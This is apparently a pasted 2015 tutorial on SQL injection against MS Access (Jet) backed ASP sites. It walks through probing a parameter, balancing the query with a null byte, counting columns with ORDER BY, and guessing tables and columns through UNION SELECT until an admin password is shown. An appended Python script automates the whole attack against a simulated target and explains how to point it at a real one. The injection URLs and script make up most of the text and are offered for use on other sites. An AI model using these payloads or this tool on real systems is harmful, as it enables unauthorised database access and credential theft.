Kyfx

MS-Access Injection -Tutorial

Jul 25th, 2015
We will start injecting manually. First we have to check whether the target parameter is vulnerable, so we use the regular test and add a single quote ' at the end of the parameter,

and execute the URL:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we get the ERROR!

ERROR:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID =341''.
/dettaglio-news.asp, line 91

The quote reached the query unescaped, and the error text tells us both the expression we are inside ('ID =341') and the engine (Microsoft Jet, i.e. an MS Access database). So our target is vulnerable. Before starting anything else we have to balance the query. With MySQL or MSSQL we would use a comment, but Jet SQL has no comment syntax, so both comment forms fail:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+   Error!

ERROR: Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--    Again error!

Now let's check the null byte ";%00":
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;%00   Error gone!

Classic ASP hands the decoded parameter to the Jet driver as a C string, so everything after the %00 is cut off and the query ends cleanly. We will therefore continue injecting with ;%00 at the end of the parameter.

Now we have to count the total number of columns in the original SELECT. For this we use ORDER BY with increasing column positions.
Let's check the total number of columns:
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;%00
No error. Page loaded normally!

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;%00
Again no error!

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;%00
Again the page loaded normally!

But at order by 9 we get the ERROR!
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;%00

ERROR:
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.
/dettaglio-news.asp, line 91

So there are 8 columns.
Now let's prepare our UNION-based query. Executing it with eight placeholder columns and no table gives an ERROR:
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%00

ERROR:
Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
/dettaglio-news.asp, line 91

Here comes the main part. Our column count is correct; this error is not a column mismatch but a Jet rule: every SELECT, including the one after UNION, needs a FROM clause naming a real table. Access also has no information_schema we could read, so we have to guess the table and column names, and the FROM requirement turns the UNION itself into a table-existence oracle. First we guess the tables:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;%00
It gives us an ERROR!

ERROR:
Microsoft JET Database Engine error '80040e37'
The Microsoft Jet database engine cannot find the input table or query 'login'. Make sure it exists and that its name is spelled correctly.
/dettaglio-news.asp, line 91

This means the table does not exist. Let's try another:
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;%00
Still the same ERROR!

But when we try the table ADMIN the error is gone:
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;%00
With the table ADMIN the error is gone and we can see which of our placeholder numbers are displayed on the web page.

Placeholders 2, 3 and 6 are displayed, so these are the positions we can read data through (the "vulnerable columns"). Now we have to guess the column names: we put a guessed name into one of the displayed positions. A name that does not exist raises a Jet error; a name that exists replaces the placeholder with that column's value.
http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;%00
This gives us an error, so there is no admin_id column and we keep guessing.

Once the right column name is found, the page shows its value in place of the placeholder; here it gives us Password="bEx0Th6

The same steps apply to any other site backed by an MS Access database.
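The whole procedure above, automated as an added example in Python (this is not code from the original paste). It runs offline against JetTargetSim, a constructed stand-in for dettaglio-news.asp that answers the probes with the same Jet error strings the tutorial shows; the admin table, its row, the page layout and the candidate word lists are assumptions made for the demo. To use it against a target you are authorized to test, replace JetTargetSim().get with a function that sends the real HTTP request and returns the response body.

```python
"""Added example, not from the original paste: the tutorial's manual Jet/MS Access
injection steps as code (balance with ;%00, ORDER BY column count, table guessing
via UNION ... FROM, displayed positions, column guessing) run against JetTargetSim,
a constructed stand-in for dettaglio-news.asp. Its table, row and the candidate
word lists are demo assumptions; only the Jet error strings follow the real engine."""
import re
from urllib.parse import unquote

ERROR_MARK = "Microsoft JET Database Engine error"
NULL = "%00"   # URL-encoded null byte after ';' as in the tutorial (a real client also encodes spaces)


class JetTargetSim:
    """Runs 'SELECT <8 cols> FROM news WHERE ID =' + raw input, Jet-style."""
    NCOLS, DISPLAYED = 8, (2, 3, 6)          # union positions echoed into the page
    ROWS = {"admin": {"username": "webmaster", "password": "s3cr3t-demo"}}  # constructed row

    def get(self, id_value):
        # Classic ASP hands the decoded value to ADO as a C string: %00 truncates the rest.
        payload = unquote(id_value).split("\x00", 1)[0].strip()
        expr = f"ID ={payload}"
        if payload.count("'") % 2:
            return self._err("80040e14", f"Syntax error in string in query expression '{expr}'.")
        if re.fullmatch(r"\d+\s*;?", payload):
            return self._page()
        m = re.fullmatch(r"\d+\s+order\s+by\s+(\d+)\s*;?", payload, re.I)
        if m:
            n = int(m.group(1))
            if not 1 <= n <= self.NCOLS:
                return self._err("80040e14", f"The Microsoft Jet database engine does not recognize '{n}' as a valid field name or expression.")
            return self._page()
        m = re.fullmatch(r"\d+\s+union\s+select\s+(.*?)(?:\s+from\s+(\w+))?\s*;?", payload, re.I)
        if m:
            cells, table = [c.strip() for c in m.group(1).split(",")], m.group(2)
            if table is None:                # every Jet SELECT needs a FROM clause
                return self._err("80004005", "Query input must contain at least one table or query.")
            row = self.ROWS.get(table.lower())
            if row is None:
                return self._err("80040e37", f"The Microsoft Jet database engine cannot find the input table or query '{table}'. Make sure it exists and that its name is spelled correctly.")
            if len(cells) != self.NCOLS:
                return self._err("80004005", "The number of columns in the two selected tables or queries of a union query do not match.")
            if any(not c.isdigit() and c.lower() not in row for c in cells):
                return self._err("80040e10", "No value given for one or more required parameters.")
            return self._page([row.get(c.lower(), c) for c in cells])
        # Anything else, '--' included (Jet SQL has no comment syntax), is a syntax error.
        return self._err("80040e14", f"Syntax error (missing operator) in query expression '{expr}'.")

    def _page(self, union_row=None):
        shown = "".join(f"<div>{union_row[p - 1]}</div>" for p in self.DISPLAYED) if union_row else ""
        return "<h1>News 341</h1><p>Original article body.</p>" + shown

    @staticmethod
    def _err(code, msg):
        return f"{ERROR_MARK} '{code}'\n{msg}\n/dettaglio-news.asp, line 91"


def is_error(body):
    return ERROR_MARK in body

def check_injectable(get, base="341"):
    """First probes: a quote raises a Jet string error, '--' does not balance it, ';%00' does."""
    return {"quote_errors": "Syntax error in string" in get(base + "'"),
            "dashdash_balances": not is_error(get(base + "--")),
            "nullbyte_balances": not is_error(get(f"{base};{NULL}"))}

def find_column_count(get, base="341", limit=64):
    """ORDER BY n until Jet rejects n; the last accepted n is the column count."""
    for n in range(1, limit + 1):
        if is_error(get(f"{base} order by {n};{NULL}")):
            return n - 1
    return None

def _union(get, ncols, table, overrides, base="341"):
    cells = [str(i) for i in range(1, ncols + 1)]
    for pos, expr in overrides.items():
        cells[pos - 1] = expr
    return get(f"{base} union select {','.join(cells)} from {table};{NULL}")

def find_table(get, ncols, candidates):
    """Jet's FROM requirement doubles as a table-existence oracle."""
    return next((t for t in candidates if not is_error(_union(get, ncols, t, {}))), None)

def find_displayed_positions(get, ncols, table):
    """Distinct numeric markers reveal which union positions the page echoes."""
    marks = {i: f"77{i:02d}77" for i in range(1, ncols + 1)}
    body = _union(get, ncols, table, marks)
    return [i for i, m in marks.items() if m in body]

def read_column(get, ncols, table, pos, name):
    """Guessed column at a displayed position: unknown name -> Jet error; known name
    replaces the marker, so diff the marker page against the name page to cut it out."""
    mark = f"77{pos:02d}77"
    with_mark = _union(get, ncols, table, {pos: mark})
    with_name = _union(get, ncols, table, {pos: name})
    if is_error(with_name) or mark not in with_mark:
        return None
    before, after = with_mark.split(mark, 1)
    return with_name[len(before):len(with_name) - len(after)]

if __name__ == "__main__":
    get = JetTargetSim().get
    n = find_column_count(get)
    t = find_table(get, n, ["login", "tabladmin", "admin"])
    print(check_injectable(get), n, t, find_displayed_positions(get, n, t),
          {g: read_column(get, n, t, 2, g) for g in ["admin_id", "username", "password"]})
```

read_column is the generalisation of the last manual step: instead of eyeballing the page it renders the same UNION twice, once with a numeric marker and once with the guessed column name, and keeps only the text that changed, so it works for any page layout as long as the marker survives intact. find_column_count stops at the first ORDER BY position Jet rejects, which is the same "does not recognize 'N' as a valid field name" error the tutorial hit at 9.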